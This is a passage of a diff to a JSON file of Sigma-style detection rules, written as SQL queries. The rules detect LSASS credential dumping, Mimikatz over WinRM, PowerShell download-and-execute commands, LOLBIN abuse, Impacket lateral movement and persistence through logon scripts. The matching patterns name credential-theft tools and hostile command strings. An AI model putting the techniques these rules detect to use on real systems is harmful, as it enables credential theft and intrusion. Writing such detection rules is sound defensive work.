'%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Unknown" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", - "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "status": "test", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "status": "experimental", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Suspicious Driver Install by pnputil.exe", - "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", "status": "test", - "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", - "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Pnputil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Unlikely, since these tools shouldn't access lsass.exe at all" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\pnputil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", - "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "status": "stable", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1059" + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Use Of The SFTP.EXE Binary As A LOLBIN", - "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "status": "experimental", - "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_sftp.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", - "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" }, { - "title": "Use of VisualUiaVerifyNative.exe", - "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate testing of Microsoft UI parts." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", - "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "status": "test", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "PUA - Sysinternals Tools Execution - Registry", + "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of SysInternals tools. Filter the legitimate paths used in your environnement" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' 